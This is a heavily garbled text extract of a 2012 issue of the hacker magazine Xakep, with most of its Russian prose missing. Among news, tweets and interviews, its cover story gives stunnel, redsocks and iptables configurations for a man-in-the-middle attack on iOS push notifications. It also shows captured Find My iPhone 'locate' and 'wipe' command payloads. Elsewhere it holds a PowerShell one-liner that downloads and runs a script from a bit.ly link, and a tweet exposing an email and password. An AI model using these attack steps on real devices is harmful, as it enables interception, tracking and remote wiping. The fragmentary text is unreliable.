056

WWW.XAKEP.RU

-
highload

PHP-CGI

07 (162) 2012

: 230 .

018

, IOS


024


MAIL.RU GROUP

032


WINDOWS

076

SCALA?










'HOO




step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)


PC_ZONE UNITS

UNIXOID SYN/ACK
MALWARE


PR-

step (step@real.xakep.ru)
(goltsev@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
gorl (gorlum@real.xakep.ru)

(vagizova@glc.ru)

DVD

Unix-
Security-

ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)

ART
-

(alik@glc.ru)



PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906




-


.: (495) 935-7034, : (495) 545-0906


, ,
.
. Google Street View .
. URL.
,
, . , ,
3-4 .

. , ,
, .
?
, ,

. , Android
, Google
GTalkService
.
Apple Push Notification Service iOS.
,
.
, ,
iPhone' ,
.
step, . . ][
twitter.com/stepah



TECHNOLOGY

CORPORATE
-

(zinaidach@glc.ru)
(filatova@glc.ru)
(polikarpova@glc.ru)
(melnikova@glc.ru)
(kachurin@glc.ru)
( )
(tatarenkova@glc.ru)
(bulanova@glc.ru)

(korenfeld@glc.ru)

(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)

:
DVD-: claim@glc.ru.

: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002.
Scanweb, . 217 600 .
.
. ,
, . .
.

: content@glc.ru.
, , 2012

Content

014

HEADER
004
011

MEGANEWS

hacker tweets
-

10 60

WEBBY AWARDS 2012

016
017


LEGO
Proof-of-concept
Google reCAPTCHA 99,1%

COVERSTORY

024


Mail.Ru Group

COVERSTORY

018
iZombie,
SSL
iOS Wi-Fi-

110

116

PCZONE
032

036

040



Chocolatey
?




044
048
052
056
060
064

Easy-Hack



SMBRelay
SMBRelay Windows 7
VMware vCenter

PHP:
PHP-CGI
X-Tools

MALWARE
066

070

drive-by -

drive-by

-

094

UNIXOID
102
106
110

080

086

090

Scala-
Scala
,



Crypto++ RSA

,



GNOME: GTK+ GNOME Shell

suckless.org

, , Android

SYN/ACK
116
122

128


UTM-

nginx + PHP-FPM + test-cookie + geoip
+ Naxsi

Microsoft

132

Do Not Track

FERRUM
134

076

HighLoad. #1

!

Intel X79 Express

139
140
144

8,5
FAQ
FAQ
WWW2
web-

MEGANEWS
WE ARE THE CHAMPIONS
ACM-ICPC

2012 International Collegiate Programming Contest (ACM-ICPC). ,
, IBM,

.
ACM-ICPC, . : 8500 2219
85 , 112 ,
- ,
( ). 2004, 2008 2009 ,
.
,

.
IBM, .
, -

ACM-ICPC-2012 ,
. !




ACM-ICPC

. ,
, 37-


2013 .

10 YOTA
LTE.
14

LTE.

004

RIM BLACKBERRY 10,


QNX.
,

.



, ,
Symantec.

GOOGLE

oogle , ,
. ,
- ,
Street View ,
Wi-Fi ( , ).

. , .
IT- , , ,
,
. FCC Google
e-mail , .
Street View. ,
Wi-Fi .

SONY:

,
5,7 .

:
,
108 035 1800
!

WESTERN DIGITAL SCSI


Trade Association Technology
SSD- SAS,

12 /.

07 /162/ 2012

,
.


2012 , Sophos.

INTEL

INTEL -
Intel, ,

Raspberry Pi. Raspberry
Pi


,
iPad
.

, Intel ,
. PAX East,
-, NUC
(Next Unit of Computing), . 1010 !
VIA Pico-ITX, 107,2 ,
VIA Nano-ITX (1212 ). NUC
, Core i3/i5
Sandy Bridge Intel HD
3000 DDR3 (
SO-DIMM). NUC ,
. .
Thunderbolt, USB 3.0, 802.11 b/g/n HDMI.
NUC 100 .
.

MICROSOFT , CONFICKER

MICROSOFT
SECURITY INTELLIGENCE
REPORT,
2011
CONFICKER
1,7
006

PROOF-OF-CONCEPT

. TapLogger,
Android OS, ,

.


(, ).
, ,

.
, .
TapLogger ,
. - ,
.
TapLogger
.
,
PIN-.
PIN-

,
.
,

.
PIN-.
: ,
PIN-
10 000 .
TapLogger, 81
!
PIN-,
, TapLogger
729,
80%.

Android, . TapLogger ,

,
, Windows 8 BlackBerry
OS.
iOS-. : Android
,

, , .
: cse.psu.edu/~szhu/papers/taplogger.pdf.


MICROSOFT Security Essentials 4.0.

TORRENT

CHROME
1
CHROME .
, Google
Chrome, . Google 20
2012 , ,
Chrome ,
.
StatCounter, Google Chrome
,
Firefox . ,
Microsoft Internet Explorer.
I
, . Chrome
, , 20
Google IE, , ! , IE
. 2011 43,9%
31,4%, Chrome ,
, 20% 32%.
, Chrome ,
- . , Internet Explorer
Chrome 30,9% 27,1%.
Microsoft
72,3% ( 86,9%,
).
:
Google Chrome
,
Opera.

CERT Torrent
( uTP) - .

, .
,
IP-.
uTP
. uTP
,
23 ! IP-
,
, ,
, , , .
. :

; -
;
; . ,
Pirate Pay.
Microsoft,
-,
-.



uTP
. ,


CERT.
2011:

183
UDP
(~0,2% )
2012:

957
047
UDP
(~45% )




iPhone.
200 .
VK
Messages ( VK)
21- .
Objective
C!
2,5 .
VK
Android.

008

2011 4,5
,


12,5 ,
Group-IB.



- The
Pirate Bay, ,
.


13 eMule eDonkey2000.

SAMSUNG GALAXY S III


SAMSUNG
Samsung Mobile Unpacked 2012,
, GALAXY S.
Super AMOLED 4,8
1280720 . : 8- ( BSI)
,
1,9- , HD- 30 .
Android 4.0 (Ice
Cream Sandwich).
. ,
Samsung Galaxy S III SC-06D Snapdragon S4 (
) 2 RAM,

Exynos 1 RAM.
Samsung . ,
16 32
, 64 .
microSD ( 64 ).
2,5G (GSM/GPRS/EDGE) 850/900/1800/1900 , 3G
(HSPA+ 21 /) 850/900/1900/2100
4G LTE.
Wi-Fi 802.11 a/b/g/n, GPS/
GLONASS, NFC Bluetooth 4.0 (LE). Samsung Galaxy S III
Wi-Fi Channel Bonding,
Wi-Fi.
2100 .
136,670,68,6 , 133 .
:
. ,
( ) -. ,
,
Samsung.
,
Apple . GALAXY S III Android 4.0 , ,
, .

:
, . S
Voice
, , , .
, , ,
: - ,

.
Smart stay
,
!
Android Beam S Beam, ,
Samsung Galaxy S III.
1 , 10 . ,
, , ,
. :)
5 .
GALAXY S III 16
29 990 .
,
.

KICKSTARTER PEBBLE E-PAPER





10

!

#hacker tweets
@mubix:

, ,
. #_

@cBekrar:

, Adobe , Photoshop, Illustrator


Flash Pro . http://bit.ly/J7Wr5U

@ruddy_ru:

:
.


VirtualBox' ,

. . :(

@jduck1337:

Adobe .
... ,

, .

Google
Chromium Blog: Fuzzing for Security
http://t.co/mAX3TTIn.
:


,
Google? .

@joshcorman:

,
@haroonmeer #ITWebSec

@davienthemoose:
@i0n1c:

Apple ID +
,

iCloud

.
CEH
- :(. ,
! #BsidesChicago
:

@ajitbtw:

@i0n1c ajitbtw@gmail.com Pass Ajit12345

CEH
. ,
!

:)
@msimoni:

,
Null.

... http://t.co/nuFcEL1K
:


. :)

@JohnLaTwC:
@i0n1c:

,

,
, .
:

@mwtracker:

CVE-2011-0611: Flash PDF


PDF
, .
:

, ?

www.surfpatrol.ru.


-2. ,
PHP
( .php?-s).
Apple,
iPad3.

, ,
Word , SEH
SHE.
:

(. SEH Structured Exception


Handling) Microsoft
Windows, ,
.

@MarkWuergler:

zero day.
- - , , , ,
, -.


FACEBOOK . 2012- 901 .

3D-

,
Cube 3D-
.

3D-
Solidoodle,

499 .


3D-. , , The
Pirate Bay ,
. :). , 3D- ,
,
. ,
3D- . 3D- Cube
CES 2012 Cubify.
(Plastic
Jet Printing, PJP). 141414 ,
, , 250
. (262634 ) 4,3 (
). Cube
Wi-Fi 802.11b/g. 1299 .
50 , ( ). ,
1314 .

2013 Ahlstrom
EasyLife,
.

Wi-Fi! :)

012


1525
VPN-,

Cybernorms.
VPN 40%.

GOOGLE

3133,7 20 000
.

PHP


-
CVE-2012-1823 PHP-CGI,
,
Reddit.
Eindbazen. , 2004
PHP - =
. CGI RFC, =

, . 2004
PHP ,

?-s URL PHP-
-s PHP-CGI. PHP ,
,
.
safe_mode, allow_url_include,
- ini. PHP Group PHP 5.3.12 PHP 5.4.2,
.
.
PHP: .

DVD
Windows
8
DVD Media
Player .
VLC Media Player Classic
!

APPLE ITUNES


(jailbreak).

:
j*******k.


SOPHOS, Mac Windows, Mac OS X.

MICROSOFT SKYPE
VOIP-
Microsoft VoIP Skype 8,5 .
,
, ,
Skype. , ,
:
,
. , Skype
P2P-: , , , ,
, .
,
.
48
, 800 .
Microsoft
. Immunity Security , Microsoft

Linux,
GRSecurity.
,
, Microsoft.
4100 ( 41 )
.
, -
Skype
. , ,

,

. , , -
P2P- ,
,
Skype , .
Skype, , Skype
5.5 , IP- ,
. , , Pastebin (pastebin.com/rBu4jDm8).
, , Microsoft
,
P2P-. , Microsoft ,
-.
- .

FOXCONN APPLE

FOXCONN
,


IPANEL (ITV)

2000 ICANN, ., ..

WEBBY AWARDS


-


( ). ,


.


.

Webby
Awards
16 . 10 60

2012 .

Webby Awards -,
. Webby - , -, ,

. .
Skype / (
). ,
Super 8
.
Evernote
. Dropbox :
- -.
Pinterest () Google+ ();
Pitchfork Pandora.

Webby Awards 2012 ,


: Instagram
, Facebook
.



,
,
.
, , , . ,
?
!
,
Pegasus Global Holdings
CITE, .
, ,
: ,
.
; -
-.
, , ,

: ,
, ,
. ,
Pegasus Global Holdings, - .


Firefox Chrome


. ,

,
,
SSL-.

.
, , -
.

014

NMAP 6
(NMAP.ORG/6),
3924
.
348,
Zenmap GUI.

DDR4
. Samsung
Hynix Micron
Technology .


APPLE: .

MICROSOFT

Apple
,
Windows 8


.


Microsoft,


.

Windows 8
, Microsoft
. , HomeOS ,
, , ,
, . , Microsoft
:
, . ,
HomeOS 48
12 . , , .
,
.
, C# .Net Framework 4.0 .
: ,
.
HomeStore,
,
HomeOS. ,
, Microsoft
.
, , , Microsoft.
,
Kinect. , Microsoft Research

SoundWave.
,
. ,
SoundWave . 1822 ,
,
. .
- ,
API-.
SoundWave ,
/ /,
. , :
90100% (
). ,
, SoundWave
Metro Windows 8,

.



NASDAQ,
-
FACEBOOK
30


HEADER


LEGO
GOOGLE BLOCKLY

, . bit.ly/KPh7fO ,
.
Blockly Google. ,
( ,
) . Blockly
,
LEGO.

: , ,
if-then- ,
. ,
,
,


Scientific American 1986 :).
, Google Scratch.


(scratch.mit.edu).
?
Blockly

Python, JavaScript

016

Blockly

Dart. ,
. : ,
, :).
, Blockly
-
, . , - :).

APP INVENTOR
Scratch, , . , App
Inventor (appinventoredu.mit.edu), , ,
- ,

Android.
WYSIWYG-
. ,
Scratch.

- .
,
Java-. , ,

, Google Play.

, Scratch, stencyl (www.stencyl.com).


,
2D-,
iOS (
iPhone iPad), Flash (
). :

Android HTML5.
,
.
.
,
?
:). z


Stencyl


Proof-of-Concept
GOOGLE RECAPTCHA
99,1%

?
,
- CAPTCHA.
, ,

. , , .
,
CAPTCHA API. , ,
reCAPTCHA (recaptcha.net).
,
,
, reCAPTCHA
.
.
, OCR-
, , .
, . : ,
,
(, 2009 Google).

Google Streets
View. :
. ,

Layer One DC949 (dc949.org)


Stiltwalker,
Google reCAPTCHA 99,1%.
:).

?
,
. , ,
reCAPTCHA , .
:
, .
,
, , . DC949?

(. ). ,
.
, reCAPTCHA
58 .
Open Source Hash (www.phash.org)
. ,
, 58 .

30%. . ,
50 reCAPTCHA
MD5,
99,1%- .



( Linux).
Stiltwalker Layer
(bit.ly/NAJ4Ja). 99,1%
reCAPTCHA,
. Stiltwalker
Google ,
reCAPTCHA . ,
, Stiltwalker
. z

017

COVERSTORY

(a2f3x7@gmail.com)

SSL

IOS
WI-FI-
018

iPhone
iPh
iPad
iP d
,
Apple. ,
,

. :
-
?

iZombie,

, iPhone/iPad. ,
, Apple .
, ,
. - , -

. , Apple,
, Apple ,
, . -,
Apple !
,
. - ,

. , : !

PUSH?
, iOS
. Apple's Push Notification Service (APNs),
Push.
SSL ( payload
256 ) ,
Apple
. iOS ,
iPhone iPad
. ,
(CA) Apple
(, , ). iOS , ,
Apple , SSL- 5223-
. :
iOS , CA,
,
.
Apple , APNs . , ,
APNs iOS. .
SSL-
, , ,
.
, .
, iOS Apple
ACK- (0d 00 00 00 00 )
.
APNs? , ,
iOS. ,
. :

APNS iOS-

iPhone ( fmip, ). , , .
:

? , -, .
MITM-, Apple , CA, .
iPhone, :
1. .
2. SSH root.
3. CA.
4. private/var/Keychains nimble.
5. push-bin.crt
push-bin.key ( DER PEM).
6. stunnel :

{
"serverContext":{
"tapSendTS":"2012-05-08T18:55:36.668Z",
"tapSendContext":"fmip"
}
}

, , ,
Apple iCloud Find my


ACK- (0d 00 00 00 00), iOS


[apple_mitm_push_s]
accept = 0.0.0.0:5222
connect = 127.0.0.1:9500
cert = /home/attacker/CA/courier.push.apple.com.pem
# push-,
# CA
key = /home/attacker/CA/courier.push.apple.com.key
[apple_mitm_c]
cert = /home/attacker/CA/push-cert.pem
key = /home/attacker/CA/push-key.pem
# ,
# Apple
client = yes
accept = 0.0.0.0:9500
connect = 17.149.36.129:5223
# Push- Apple

, port-forwarding ( iptables
), 5223-
5222.
,
Push .
3 , .

IOS?
iOS, iPhone/iPad,
(
UNIX).

,
, ,
, ,
Security Server (securityd). ,
. , ,
Apple (, ), SQLite keychain-2.db,

020

3
.
securityd-
Apple.
securityd:
1. CA Apple,

keychain-2.db. Apple , .
iOS
.
2.

(CA).
CA, ,
CA .
, .
, , SSL-,
iOS ,
: . ,
.

CA IOS
iOS:
;
;
MDM (Mobile Device Management).
, MDM
. ,

, :
1. .
2. .


WWW

INFO


securityd Apple:
bit.ly/K1bAGs;
BLOBFORMAT:
bit.ly/K1bJtI;

Push Notification:
bit.ly/iCdRmd;

Notification Payload:
bit.ly/eVWx7j.


,

.

,
,

, udid
URL,

.

WARNING
,

,

,
.
!

. .

3. ~99% iOS .

Android
, Google

APNs , , ,


.
C2DM (Cloud to Device
Messaging Framework),

Android-
(bit.ly/nsvWcb).

, ,

-. redsocks (darkk.net.ru/redsocks)
:

! :)
. , iPhone Splashscreen
( , hotspot) ,
, ,
.

- .
, , Wi-Fi ,
( , , aireplay-ng
) , . :
1. .
2. splashscreen.
3. .
. .
, hotspot , SSL-
. ,
iPhone/iPad securityd, , ,
PayPal App Store

MITM ?
MITM-
, , :
1 CA c OpenSSL.
2. ( ChilliSpot,
www.chillispot.info). splashscreen
iPhone -
, iWebkit.
3. SSL-


base{log_debug = on; log_info = on; log = "file:/tmp/reddi.log"; daemon = on; redirector = iptables;}
redsocks { local_ip = 0.0.0.0; local_port = 31337;
ip = 127.0.0.1; port = 31338; type = http-connect; }

iptables:
iptables -t nat -N REDSOCKS
iptables -t nat -A REDSOCKS -d 0.0.0.0/8 -j RETURN
iptables -t nat -A REDSOCKS -d 10.0.0.0/8 -j RETURN
iptables -t nat -A REDSOCKS -d 127.0.0.0/8 -j RETURN
iptables -t nat -A REDSOCKS -d 169.254.0.0/16 -j RETURN
iptables -t nat -A REDSOCKS -d 172.16.0.0/12 -j RETURN
iptables -t nat -A REDSOCKS -d 192.168.0.0/16 -j RETURN
iptables -t nat -A REDSOCKS -d 224.0.0.0/4 -j RETURN
iptables -t nat -A REDSOCKS -d 240.0.0.0/4 -j RETURN
iptables -t nat -A REDSOCKS -p tcp --destination-port \
443 -j REDIRECT --to-ports 31337
iptables -t nat -A REDSOCKS -p tcp --destination-port \
80 -j REDIRECT --to-ports 31339
iptables -t nat -A PREROUTING -i at0 -j REDSOCKS

, . (443
80) ,
( HTTP Burp
Proxy). HTTPS Redsocks (
, darkk
).
4. Redsocks Charles Proxy
(www.charlesproxy.com), 31338- .
,
, .
.

MITM-
,
.

! ! !
, ,
Push.
, ,
iPhone , . APNs-,
,
. Push- iOS
,
, :
{
"serverContext":{
"tapSendTS":"2012-05-08T18:55:36.668Z",
"tapSendContext":"fmip"
}
}

, SSL, !

, fmip
Find My iPhone. , iOS iCloud, HTTPS (
HTTP
).
POST- (
) (
):

App Store

{
"endThreshold": 10,
"ackURL": "https://p02-fmip.icloud.com:443/fmipservice/findme/403955807/7be6fa307846b670f0346c00af720c347f5f1eb8/ackLocate",
"decayFactor": 0.7,
"desiredAccuracy": 40,
"startThreshold": 2000,
"locationValidityDuration": 120,
"id": "6df3ff6f-f365-499e-b921-93641206bffa",
"enqueueTimestamp": 1336505766732,
"cmd": "locate",
"includeTrackingInfo": false,
"overridenCommandDomain": null,
"locationTimeout": 120,
"findMyiPhone": true,
"responseTimeStamp": 1336505766732
}

{
"deviceInfo": {
"buildVersion": "9B176",
"aps-token": "285cdaffeb5f8767233ebdfe3a2df07797ae864e586ce902c321f222f84d333",
"passcodeConstraintStr": "Enter a four-digit passcode.",
"deviceColor": "black",
"productVersion": "5.1",
"batteryLevel": 0.1292443,
"deviceName": "iPhone test",
"locationServicesEnabled": true,
"findMyiPhone": true,
"productType": "iPhone2,1",
"udid": "7beafa302d46b670f0657c00af720c347f5f1eb8",
"passcodeConstraint": "simple",
"deviceClass": "iPhone",
"batteryStatus": "Charging",
"passcodeIsSet": true
},
"serverContext": {
"tapSendContext": "fmip",
"tapSendTS": "2012-05-08T21:05:37.132Z"
},
"deviceContext": {
"deviceTS": "2012-05-08T21:05:38.210Z"
}
}

.
,
. : ? ,
iCloud. , ,
, iCloud
:

022

( ) :
{
"locationFinished": false,
"deviceContext": {
"cmdId": "6df56f6f-f445-499e-b921-93641006bffa",
"deviceTS": "2012-05-08T19:36:11.391Z"
},
"deviceInfo": {
"udid": "77be6fa307846b670f0346c00af720c347f5f1eb8"
},
"alt": 141.3043212890625,
"positionType": "Wifi",
"vertAcc": 10,
"longitude": 37.5862605508342,
"latitude": 55.72784808181711,
"statusCode": 200,
"timestamp": "2012-05-08T19:36:09.195Z",

"horizontalAccuracy": 71.1873037658878
}

GPS-,
? :)
wipe, . ,
,
:
{
"message": "",
"id": "06c0a5f9-5126-4428-b875-59acbb956714",
"enqueueTimestamp": 1336510929036,
"cmd": "wipe",
"pin": "",
"overridenCommandDomain": null,
"ackURL": "https://p02-fmip.icloud.com:443/fmipservice/findme/408888807/0346ca302d46b670f0346c00af720c347f5f1eb8/ack",
"responseTimeStamp": 1336510929032,
"verifyURL": "https://p02-fmip.icloud.com:443/fmipservice/findme/408888807/0346c7802d46b670f0346c00af720c347f5f1eb8/wipeVerify"
}

, 408888807/0346c7802d46b670f0346c00af720c347f5f1eb8/ URL ( ,
). id
: - , . ,
,
verifyURL :
{
"id": "06c0a5f9-5126-4428-b875-59acbb956714",
"ackURL": "https:\/\/p02-fmip.icloud.com:443\/fmipservice\/findme\/408888807\/0346c7802d46b670f0346c00af720c347f5f1eb8\/ack",
"deviceContext": {
"deviceTS": "2012-05-08T21:05:39.604Z"
},
"enqueueTimestamp": 1336510929036,
"responseTimeStamp": 1336510929032,
"deviceInfo": {
"buildVersion": "9B176",
"aps-token": "285cda0ffeb5ff767233ebdfe3a4df07797ae864e586ce902c321f222f84d333",
"passcodeConstraintStr": "Enter a four-digit passcode.",
"deviceColor": "black",
"productVersion": "5.1",
"batteryLevel": 0.1292443,
"locationServicesEnabled": true,
"findMyiPhone": true,
"productType": "iPhone2,1",
"udid": "7beafa302d46bffff0346c00af720c347f5f1eb8",
"passcodeConstraint": "simple",
"deviceClass": "iPhone",
"passcodeIsSet": true
},
"overridenCommandDomain": null,
"message": "",
"statusMessage": "OK",
"verifyURL": "https:\/\/p02-fmip.icloud.com:443\/fmipservice\/findme\/408888807\/0346c7802d46b670f0346c00af720c347f5f1eb8\/wipeVerify",
"cmd": "wipe",
"pin": "",
"cmdContext": {
"ackURL": "https:\/\/p02-fmip.icloud.com:443\/fmipservice\/findme\/408888807\/0346c7802d46b670f0346c00af720c347f5f1eb8\/ack",
"message": "",
"id": "06c0a5f9-5126-4428-b875-59acbb956714",
"verifyURL": "https:\/\/p02-fmip.icloud.com:443\/fmipservice\/findme\/408888807\/0346c7802d46b670f0346c00af720c347f5f1eb8\/wipeVerify",
"enqueueTimestamp": 1336510929036,
"cmd": "wipe",
"responseTimeStamp": 1336510929032,
"pin": "",
"overridenCommandDomain": null
},
"statusCode": 200
}


200 ( 200 HTTP--,


), iOS , , !
: wipe iPhone,
soft reset . ,
, .
- ,
iCloud.

. ?

Apple, .
, :
1. . ,
wipe locate .
2. (
).
3. .
,

, . 1001- :
, , , . Apple, , ,
,

- ,
. ? z

023

COVERSTORY

0000000000

Mail.Ru
01 .
20

2005
,

Mail.Ru Group.

c OS X
Ma .

.

,
C 6 0 23-00.
11-0

MAIL.RU

Mail.Ru , - .
, , -.
, . Mail.Ru UNIX, Mail.Ru Group
, .
024


MAIL.RU
60 200 .



. . , ,
, .
Mail.Ru , .
, .
,
, , , 2005
.
Mail.Ru
60 200 .

, .
, .
,
. - ,
. ,
.
, .
,
-
. ,
,
.
11 , 8 .

,
,

, .
-
. ,
,
. ,
,
, ,
,
.
,
.
, ,
.
, , ,
.
, ,
, ,
,
, -
.

.
.


.
-
,
.
.
, .
. :)

R&D
. ,
, ,
.
/
, .
.

.
:
,
,
/++. Perl
, , , C. Python
- Ruby.

Perl , ,
. , .
Perl-.
, ,
. ,
. Perl,
.
.

MAIL.RU GROUP
.
, .

, .
2003 . ,
ICQ,
,
, , .
ICQ?
.
, ,
ICQ .
,
Mail.Ru ( , ,
, IT-).
, ICQ,
, Mail.Ru Group.

. -


Mail.Ru

025

COVERSTORY

Mail.Ru Group :)

:
.
commit ( ),

( )
.

,
. -
,
,
. , ,
,
.
,
, .
,
, , -
.
, Open
Source Linux. ,
,
- .

, Open Source

, .
,
, , .
, .

026


- . . , ,

,
. , ,
- nginx, .
. Mail.Ru
Group -

, ,
.
. Hadoop
Hbase , . ,
,
.


. -

Mail.Ru ,


Mail.Ru Group

Sound Team

:
( ),
,
. , .
, ,
Open Source Tarantool. , ,
. , ,

.
, ,
,
- , .
key-value storage,
,

.
Tarantool key-value .
,

,
.
, ,
.
,
.
, .


Open Source ?
, .

.
, , .
, MySQL. ,
Open Source . - ,

. , ,
, , .
MySQL Open Source
: , . .


-,
. , ,

- .
: - ,
.

. ,
-
.
- ,
,
( ).
Mail.Ru Group
,
280 /. ,
, , , ,
. -.
.
, ,
.
, .
, .
, 24
,
.
-, ,
. ,
, .
, ,
,
,
, .
.
,
,
. , ,
, , ,
Ethernet
, .
,
.
, setup

.
() . ,
.

,
OPEN SOURCE ,
027

COVERSTORY
,
. ,

Ethernet.


Futubra .
, .
,
. , , (
, Mail.Ru Group ),
-
, .
,
: . ,
,
.
. Futubra ,
,

.
, Mail.Ru Group
. .


, .
MySQL,
NoSQL Tarantool.
, nginx Apache,
fork Exim, ,
DNS-. ,
, .
,
.
, ;
-,
. ,
. ,

,
. 13
,
. , ,
,
c .

, . ,
, ,
. . ,

, .
, Linux IPVS. -,
( :
Mail.Ru Group ). -,
.
,
.

, Instant
Messenger. ,

.
150 000 , . ,
.
Mail.Ru
,
. , - ,
.

, , -
, . .
, ,
: , ,
. ,
.
,
.
, - ,
.

MAIL.RU GROUP

@Mail.ru


,
,
DDOS'
028

DDoS, ,
.
DDoS, , .
,
,
.

, ;
, .
, ,
.
, . ,

.


Mail.Ru Group

,
, ,
. , ,
. IDS,
.
, ,
. , . ,

,
. ,
,
, .

production-. ,
, . ,
- ,
- ,
, ,
.
,
penetration testing.
-
- . ,
. ,
,
, .

MAIL.RU GROUP
,
Mail.Ru Group.
, , ,
,
IT-, .
,
. ,
:).

- :)

,
. , .
, .
, 1011 .
, . , 24
, ,
, ,
, , .
.
, ,
- , .

. , , . ,
,
. ,
.
Mail.Ru Group .
, . , .

, . ,
, .

IT-

IT-. ,
, , IT-,
,
IT-.
,
.


,
. ,
. , IT-
, Mail.Ru
Group
.
:
. .
, , ,
IT-
.
,
.
,
, .
: Russian Code Cup. ,
,

,
,
, IT-.
,
,
.
: . ,
. :
, .
,
- . ,
.
20 UNIX- , Kris Buytaert, Garrett Honeycutt,
Joshua Thiessen, , ,
Mail.Ru Group. z

029

Preview

26 .
.

60

PHP-CGI
Ruby, Python

,
- - PHP.

,
, , -
, .

,
.
,
, PHP
CGI.

PC ZONE

32


Microsoft
,

Chocolatey.

36

?


RapidShare
.

030

MITM,

.



.
SVN, Git, Mercurial.

MALWARE

SMBRELAY

52

40

56

VMWARE VCENTER
, ,
.

66

: ?
-

drive-by-download
.


PC ZONE

anatooly, - (anatooly@gmail.com)




CHOCOLATEY

,

Linux
Microsoft Windows.

,
.
,
. , Chocolatey.
032

, Windows?
, .
,
- . , , - (, ),
. , ( ). ,
. ,

.
.
,
. Linux-
: , !. ,


,
.NET Framework 4.0 PowerShell 2.0. ,
. 7-Zip:

MICROSOFT


,
CHOCOLATEY

cinst 7zip

, . . , , ,
, Chocolatey. , :
.
, , , ,
.
,
, .
cinst
.

(
). Ubuntu apt-get ,
.
Microsoft
( , , - Windows 8),

Chocolatey (www.chocolatey.org).


Chocolatey . ,
:


, , Chocolatey.
, (chocolatey install/update/list),
(cinst/cup/clist). :

@powershell -NoProfile -ExecutionPolicy unrestricted -Command "iex ((new-object net.webclient).DownloadString('http://bit.ly/psChocInstall'))"

CHOCOLATEY


Kindle:

PDF:

Sublime Text 2

Notepad++


PHP

Foxit Reader

Ruby

PDFCreator

Python

Inkscape

FTP-:

Calibre

Adobe Reader

Dropbox

Programmers
Notepad

Notepad2

FileZilla

Node.js

Hg

TortoiseHg

MySQL

WinRAR

KeePass

VLC

TortoiseGit

MongoDB

7-Zip

Evernote

foobar2000

PostgreSQL

SQL Server
Express

Skype

SQLite

033

PC ZONE
1. . :
cinst dropbox

SSH- Windows PuTTY


:
chocolatey install putty
chocolatey install putty -version 0.61

:
chocolatey install putty -source c:\somefolder
chocolatey install putty -source \\someserver\someshare
chocolatey install putty -installArgs "/qb" -override

2. . Chocolatey
:
cup dropbox

:
chocolatey update all

3. .
:
clist dropbox


:
chocolatey /?

?
, Chocolatey
NuGet.
.NET-,
. Chocolatey ,
. Chocolatey, NuGet.exe,
, ,
. -

cURL, curl.nuspec

: Install-ChocolateyInstallPackage, Install-Get-ChocolateyUnzip,
ChocolateyDesktopLink ,
, , .
, ,
:
1. C:\Chocolatey\lib.
2. , Chocolatey
( path),

.
3.
chocolateyInstall.ps1. ,
:

PowerShell. , (
), .
4.
-, .
, , .
,
UAC.
. , -

WINDOWS


,


.

Windows
, Windows 8 ,
.

034

Ninite
ninite.com

. :
,

,
.

.

Allmyapps
allmyapps.com
,
15 -.
.
,

. ,
-
,
.


,
( ).
, , . (,
), .
C:\Chocolatey\lib.

WWW

:
chocolatey.org;


Apache-:
github.com/chocolatey/chocolatey;


: github.com/ferventcoder/nugetpackages.


Chocolatey . ,
. , ,
, .
-
.NUPKG. XML- ( .NUSPEC) tools (
chocolateyInstall.ps1) , .
cURL.

curl.nuspec.
. tools
cURL (libcurl.dll,
libssl32.dll) curl.exe.
:

INFO

PuTTY

.




\S,
\quite.

nuget pack

curl.7.25.0.nupkg

. , :
C:\Chocolatey\lib\curl.7.25.0 .
Chocolatey.

Chocolatey apt-get Windows. ,


Chocolatey ,
. ,
,
IDE,
. -

CoApp
coapp.org
,
Microsoft,
, Open Source .
CoApp
, ,
.
, , .


Chocolatey NuGet

, Chocolatey
,
. ,
-
. , ? , ! z

ZeuAPP
zeusoft.net/products/zeuapp
,
,
.

ZeuAPP ,
, , .

SUMo
kcsoftwares.com
Software Update Monitor, .
SUMo

(, ) .
, ,
, .

035

PC ZONE

, - (yani@yani.ru)

.


, .
, ,
Nekaka.com.
036

:


(rapidshare.com).
, .
.
: YouSendIt,
SendSpace, DepositFiles.
Dropbox, ( ),
. Dropbox
Google Drive Microsoft SkyDrive. -


Nekaka.com


, , , .
, , .

- .
(
)
, ,
( ),
. Dropboxe ,
.
-
Dropbox ,
(

).
, Dropboxe
,
, , .

?
, ,
Dropbox zalil.ru,
,
.
: , ,

. ,

, , , . ,
,
. ,
.
, Yahoo,
Hotmail AOL, .
:
.
Xeon X3430 / 8 / 2200 Raid1 (Serverclub.com/R210), .

Apache,
.
( ).

:
omploader, Jyraphe, FileZ, XtraFile.
.
( ,
2 ),

(
,
Upload ).
.

youdo.ru
.
nekaka.com.
,
.
(
Yahoo, Google Badoo?). ,
,
, .

. -

600 $;
1800 $;
1500 / 1800 $;
4200 $.

-:
33%;
800;

200 (1200 $ ).
100%,


600 + 1800*3 = 6000 $


1200*3 = 3600 $ .

2400 $
, .
:). -,
3000 -.
-,

( Dropbox)

( RapidShare). ,
,
, .

, /

.
( 1200 $)

.


;
-
,
, .
, ,
.

037

PC ZONE


. : ,
! ,
.
: 3000
. ,
!
Dropbox,
, Megaupload,
Hotfile
, ,
,
, .



,
,


( ). , .
,
. .
,

. , -,
( : --,
,
- ,
). -,
.

teamleada,
,
.
. ,
,
freelance.ru.
, : , , ,
,
.
1000 .
50 000 ,
242
T
( ).
. 10 ,

.
- ,
,

(
, 510 ,
- 100 ).

038

800 /,


,
.



:
1. .
DropArea,
.
,
( , ).
, ,
My files,
.
2. e-mail.
username@
upload.nekaka.com,
nekaka-.

e-mail.
,
, , - ,


.
.
3. torrent.
torrent,
,
,
.
- ,
.
, 10-
.
4. FTP.
e-mail,
,
. FTP-
.
.
, -

My Files Nekaka.com, ,
.
.

?

SAMBA FTP
, ,
, .
,


.
Windows Mac OS X,
,
,


:). iOS Android.

must. 40%

. .
API,

.
,
, , , ,
. - Nekaka API,
.

, ,
- ,


.

1000 ,


. : ,

(
,

). ,


1000 , 20 .
20 ,
,
10 .
.
.
,


. ,
. :
. :
, 20
1000 . 1:20,
20/(1000/20) =
0,4 $.
400
. .
50
- 6 , 400
(20 6)/(1000/20)*1 000
000 = 280 .
1:50, 1:12, , ,
